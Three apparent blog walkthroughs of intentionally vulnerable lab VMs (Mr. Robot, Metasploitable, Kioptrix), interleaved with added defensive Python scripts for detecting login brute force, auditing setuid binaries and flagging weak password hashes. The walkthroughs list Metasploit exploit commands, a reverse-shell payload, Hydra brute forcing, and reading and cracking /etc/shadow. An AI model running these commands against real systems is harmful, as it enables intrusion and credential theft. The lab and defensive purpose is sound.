Mr. Robot – Walkthrough

A number of friends and I decided to take on Mr. Robot from VulnHub (see the link: Mr. Robot). Shout out to Jason for putting this VM together. I liked the landing page, especially the link to the COMMODORE 64 emulator! Now let’s get right to it.

I threw nmap at it, and it looks like we only have ports 80 and 443 open.

nmap -p- -sT -A mrRobot

Now, I’m going to fire up Nikto and see what we get.

nikto -h mrRobot

Looks like we’ve got ourselves a WordPress site. This is what I got browsing to license:

On the other hand, robots.txt contains some juicy information for us.

key-1-of-3.txt contains our first key. I did try to crack the key, which you can tell is an MD5 hash, through multiple online crackers with no luck.

Browsing to fsocity.dic will prompt you to download a wordlist file. Now that we have the password list, all we need is a valid username to brute force our way in. So, I made a list of the names of all the characters from the show Mr. Robot to try in wp-login.php, starting with Elliot, and then I got the following, which tells me Elliot is a valid username, my friends.

I used Hydra with the option “:S=Location”, which tells Hydra to treat a response containing that string (the Location header of the redirect) as a successful login, since that is what you’re supposed to get in the HTTP response if you log in successfully.

Bingo! We found the password for Elliot, who turned out to be the administrator of the WP site.
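As an added defensive counterpoint to the wp-login.php brute force above (example code added here, not part of the original walkthrough), the same response pattern Hydra keys on is what a defender can alert on from the web server access log: WordPress re-renders the login form with HTTP 200 on a failed attempt and answers a successful one with a 302 redirect, so a burst of 200s to wp-login.php from one address followed by a 302 is the signature of a guessed password. The log lines below are constructed for the example, and the 10-attempts-in-5-minutes threshold is an assumption to tune per site.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Apache/nginx combined-log-format request line. A matching line looks like:
# 10.0.0.5 - - [10/Oct/2016:13:55:36 +0000] "POST /wp-login.php HTTP/1.1" 200 3456
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], TS_FMT)
    ev["status"] = int(ev["status"])
    return ev


def detect_login_bruteforce(lines, path="/wp-login.php", threshold=10,
                            window=timedelta(minutes=5)):
    """Flag source IPs that POST to `path` at least `threshold` times within
    `window` without being redirected (a failed WordPress login returns 200;
    a successful one returns 302).  Returns {ip: report}; the report records
    whether a redirect followed the burst, i.e. whether the guessing worked."""
    recent = defaultdict(deque)     # ip -> timestamps of failures inside the window
    failures = defaultdict(int)     # ip -> total failed attempts seen
    reports = {}
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["method"] != "POST":
            continue
        if ev["path"].split("?", 1)[0] != path:
            continue
        ip = ev["ip"]
        if ev["status"] in (301, 302, 303):
            # A redirect is a successful login; only interesting after a burst.
            if ip in reports:
                reports[ip]["success_after_burst"] = True
            continue
        failures[ip] += 1
        q = recent[ip]
        q.append(ev["ts"])
        while q and ev["ts"] - q[0] > window:
            q.popleft()              # drop failures that fell out of the window
        if len(q) >= threshold:
            rep = reports.setdefault(ip, {"first_seen": q[0], "success_after_burst": False})
            rep["failures"] = failures[ip]
            rep["last_seen"] = ev["ts"]
    return reports


def sample_log():
    """Constructed sample log (not captured from the VM): 12 rapid failed POSTs
    from 10.0.0.5 followed by a 302, plus two ordinary requests from 10.0.0.9."""
    base = datetime(2016, 10, 10, 13, 55, 0, tzinfo=timezone.utc)

    def stamp(seconds):
        return (base + timedelta(seconds=seconds)).strftime(TS_FMT)

    lines = [f'10.0.0.5 - - [{stamp(i)}] "POST /wp-login.php HTTP/1.1" 200 3456'
             for i in range(12)]
    lines.append(f'10.0.0.5 - - [{stamp(12)}] "POST /wp-login.php HTTP/1.1" 302 0')
    lines.append(f'10.0.0.9 - - [{stamp(3)}] "GET /wp-login.php HTTP/1.1" 200 2100')
    lines.append(f'10.0.0.9 - - [{stamp(4)}] "POST /wp-login.php HTTP/1.1" 302 0')
    return lines


if __name__ == "__main__":
    for ip, rep in detect_login_bruteforce(sample_log()).items():
        print(ip, rep)
```

Run against a real log with something like `detect_login_bruteforce(open("/var/log/apache2/access.log"))`; the sliding window means a slow, spread-out guess run stays under the threshold, so pair this with rate limiting or a lockout plugin on the login endpoint rather than relying on log review alone.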

Now it’s time to check Metasploit and see if there are any interesting wp-plugin exploits. The following exploit caught my eye, as it grants you a remote shell on the backend server, which is exactly what I need.

With the help of Google, I was able to download and activate this plugin on the site.

Let’s go back to Metasploit and try it out:

use exploit/unix/webapp/wp_slideshowgallery_upload
set RHOST mrRobot
set WP_USER Elliot
set WP_PASSWORD ER28-0652
exploit

We’ve successfully got a remote shell on the backend server. Now, after some poking around, I found the following in the home directory of the user robot:

Unfortunately, I was unable to cat key-2-of-3.txt; however, I was able to cat password.raw-md5, which an online MD5 cracker later resolved to the following password: “abcdefghijklmnopqrstuvwxyz”. Let’s hop to the VM console and give it a try. And sure enough, I was able to log in and get the second key.

This leaves us with the third and final key. Usually in this type of situation you need to find a way to elevate to root and start looking for the final gem. With the help of the RTFM (Red Team Field Manual) book I was able to find the following.

And then I used nmap to gain a root shell and cat the contents of the third and final key, key-3-of-3.txt.
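The root shell above comes from a general-purpose tool that runs with root privileges for whoever can execute it. The defensive check for that condition is a periodic setuid audit against a known-good baseline; the script below is an added example (not from the original walkthrough) that walks a tree, lists setuid regular files, and reports any whose name is not in the expected set. The baseline set is an illustrative assumption and should be built from a known-good image of your own hosts; the demo tree it audits is constructed in a temporary directory.

```python
import os
import stat
import tempfile

# Setuid-root programs that a stock Debian/Ubuntu-style host normally ships.
# Assumption: an illustrative baseline for the example; build yours from a known-good image.
EXPECTED_SETUID = {"passwd", "su", "sudo", "mount", "umount", "chsh", "chfn",
                   "newgrp", "gpasswd", "ping", "fusermount"}


def is_setuid(mode):
    """True for a regular file with the setuid bit set (mode as from os.lstat)."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def find_setuid(root):
    """Walk `root` without following symlinks; return sorted paths of setuid files."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished entry; skip rather than abort the audit
            if is_setuid(st.st_mode):
                found.append(path)
    return sorted(found)


def unexpected_setuid(root, expected=EXPECTED_SETUID):
    """Setuid files under `root` whose basename is not in the expected baseline.
    A general-purpose binary here (nmap, vim, find, ...) is a privilege-escalation
    path: it executes as root for any local user allowed to run it."""
    return [p for p in find_setuid(root) if os.path.basename(p) not in expected]


def build_demo_tree():
    """Constructed fixture: a temp dir holding a setuid 'nmap', a setuid 'passwd'
    and a non-setuid 'plain'. Returns (root, nmap_path, passwd_path)."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    paths = {}
    for name, mode in (("nmap", 0o4755), ("passwd", 0o4755), ("plain", 0o755)):
        p = os.path.join(root, name)
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(p, mode)  # set the bit after writing; the kernel may clear it on write
        paths[name] = p
    return root, paths["nmap"], paths["passwd"]


if __name__ == "__main__":
    demo_root, _, _ = build_demo_tree()
    print("setuid files:", find_setuid(demo_root))
    print("unexpected:", unexpected_setuid(demo_root))
```

On a real host run `unexpected_setuid("/")` as root so every directory is readable; anything it reports is either a packaging mistake or a deliberate backdoor, and the fix is `chmod u-s` on the binary (or removing it) plus a look at who added it and when.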

Happy hunting!

Pwning Metasploitable – Walkthrough

Metasploitable is a vulnerable-by-design Linux VM provided by Rapid7 for practicing the Metasploit framework. You can download it from VulnHub. I used a Kali box and VMware Player for this exercise, and also made sure that both VMs are set to host-only networking.

Now, the purpose of Metasploitable is to find a way to root the box, and there are a number of ways to do that, depending on your approach. It took me 3 exploits to r00t the box, and I’m going to go through all of them in the following section.

Fire up nmap to see what we have here.

nmap -p- -sT -A -sV -O -T4 -oN /root/Desktop/nmap_metasploitable.txt 192.168.68.144

Well, you can see there is a lot you can go after here, but I’m going to go with the easiest just because I’m lazy.

I’ll go after distccd v1 even though I don’t really know what it does. So I fired up Metasploit, searched for distccd, and was able to get a shell with daemon privileges.

use exploit/unix/misc/distcc_exec
set RHOST 192.168.68.144
exploit

However, we’re shooting for r00t.

Next, I looked for postgres exploits and found one with an excellent rating, but you’d have to have a username and password. So I fired up the Metasploit postgres login scanner, got a hit on postgres:postgres, and then used it to exploit.

use auxiliary/scanner/postgres/postgres_login
set RHOSTS 192.168.68.144
exploit
use exploit/linux/postgres/postgres_payload
set RHOST 192.168.68.144
set PASSWORD postgres
exploit

Again no rØØt shell. On to the next one.

I looked for all Samba exploits with the excellent-rating and Linux filters, which led me to usermap_script, and BOOM! I got a r00t shell.

use exploit/multi/samba/usermap_script
set RHOST 192.168.68.144
exploit
cat /etc/shadow
cat /etc/passwd

Finally, I decided to copy the shadow and passwd files and give them a try; below is the list of usernames and passwords that John the Ripper cracked.

unshadow /root/Desktop/passwd.txt /root/Desktop/shadow.txt > /root/Desktop/meta_pw_dump.txt
john /root/Desktop/meta_pw_dump.txt
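Both the password.raw-md5 file in the Mr. Robot walkthrough and the shadow hashes John chews through here fall to a wordlist for the same reason: the stored hash is fast to compute and, for raw MD5, unsalted, so every candidate costs microseconds. The audit below is an added example (not from the original post) that classifies the hash field of each shadow entry, flags the formats a wordlist attack recovers quickly, and contrasts them with a salted, iterated PBKDF2 string of the kind an application should store. The shadow lines are constructed with fake salts and hash bodies; the only real digest it computes is the MD5 of the Mr. Robot password quoted above.

```python
import hashlib
import re

# Constructed /etc/shadow-style sample: fake salts and hash bodies, not copied from any VM.
SAMPLE_SHADOW = [
    "root:$6$EXAMPLESALT$EXAMPLEHASHBODY:17000:0:99999:7:::",
    "msfadmin:$1$EXAMPLE$EXAMPLEHASHBODY:17000:0:99999:7:::",
    "legacy:EXAMPLEDESxyz:17000:0:99999:7:::",
    "daemon:*:17000:0:99999:7:::",
    "sshd:!:17000:0:99999:7:::",
]


def _verdict(algorithm, salted, slow):
    # 'weak' = a wordlist attack is cheap; None = unknown format, review by hand.
    weak = None if algorithm == "unknown" else (algorithm != "locked" and not (salted and slow))
    return {"algorithm": algorithm, "salted": salted, "slow": slow, "weak": weak}


def classify_hash(h):
    """Classify one password-hash field by its format prefix or shape."""
    if h in ("", "*", "!", "!!") or h.startswith("!"):
        return _verdict("locked", True, True)          # no usable hash at all
    if h.startswith(("$y$", "$7$")):
        return _verdict("yescrypt/scrypt", True, True)
    if h.startswith(("$2a$", "$2b$", "$2y$")):
        return _verdict("bcrypt", True, True)
    if h.startswith("$pbkdf2"):
        return _verdict("pbkdf2", True, True)
    if h.startswith("$6$"):
        return _verdict("sha512crypt", True, True)
    if h.startswith("$5$"):
        return _verdict("sha256crypt", True, True)
    if h.startswith("$1$"):
        return _verdict("md5crypt", True, False)       # salted but a single fast MD5 chain
    if re.fullmatch(r"[0-9a-fA-F]{32}", h):
        return _verdict("raw-md5", False, False)       # unsalted: one lookup table cracks all
    if re.fullmatch(r"[./0-9A-Za-z]{13}", h):
        return _verdict("descrypt", True, False)       # 12-bit salt, truncates to 8 chars
    return _verdict("unknown", False, False)


def audit_shadow(lines):
    """Return [(user, algorithm)] for accounts whose stored hash is weak."""
    weak = []
    for line in lines:
        fields = line.split(":")
        if len(fields) < 2:
            continue
        v = classify_hash(fields[1])
        if v["weak"]:
            weak.append((fields[0], v["algorithm"]))
    return weak


def raw_md5_of(password):
    """What a file like password.raw-md5 holds: a bare, unsalted MD5 hex digest."""
    return hashlib.md5(password.encode()).hexdigest()


def hash_for_storage(password, salt, iterations=600_000):
    """A salted, iterated hash an application should store instead of raw MD5.
    Format is a self-describing string: $pbkdf2-sha256$<iters>$<salt hex>$<dk hex>."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"$pbkdf2-sha256${iterations}${salt.hex()}${dk.hex()}"


if __name__ == "__main__":
    print("weak accounts:", audit_shadow(SAMPLE_SHADOW))
    print("password.raw-md5 style:", classify_hash(raw_md5_of("abcdefghijklmnopqrstuvwxyz")))
    print("stored properly:", classify_hash(hash_for_storage("example", b"0123456789abcdef")))
```

The detection lens is the same one John uses in reverse: if `audit_shadow` flags an account on a box you own, the remediation is a forced password change so the entry is rewritten under the host's current (sha512crypt or yescrypt) default, and for application data a migration off raw MD5 to a salted, iterated hash on next login.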

Happy hunting!

Kioptrix Level 1 – Write Up

In this blog, we’re going to walk through how to get a root shell on the Kioptrix Level 1 VM. First things first: after downloading/importing the VM, make sure that its network settings are set to host-only, as well as your Kali box’s. Without further ado, let’s get right to it.

Fire up nmap and kick off an intensive scan:

nmap -sT -A -T4 -p- -v 192.168.68.141 -oN /root/Desktop/nmap_results.txt

Looks like it’s running the Apache test web page on ports 80 and 443, SSH on port 22, NetBIOS-ssn on port 139, and rpcbind on port 111.

Fire up dirb and see if we can get anything interesting:

dirb http://192.168.68.141/ /usr/share/wordlists/dirb/common.txt

Well, it turns out there is nothing useful on the web page.

I tried to look for any mountable shares with no luck, but then I threw enum4linux at it and got a bunch of interesting information. The one that stuck out for me was that the VM is using Samba 2.2.1a, which I know for a fact has a Metasploit module (CVE-2003-0201).

info exploit/linux/samba/trans2open

Fire up Metasploit and use the Samba exploit:

use exploit/linux/samba/trans2open
set RHOST kioptrix
set LHOST kali
set LPORT 4545
set PAYLOAD generic/shell_reverse_tcp
exploit
uname -a
id

Bingo!

Happy hunting!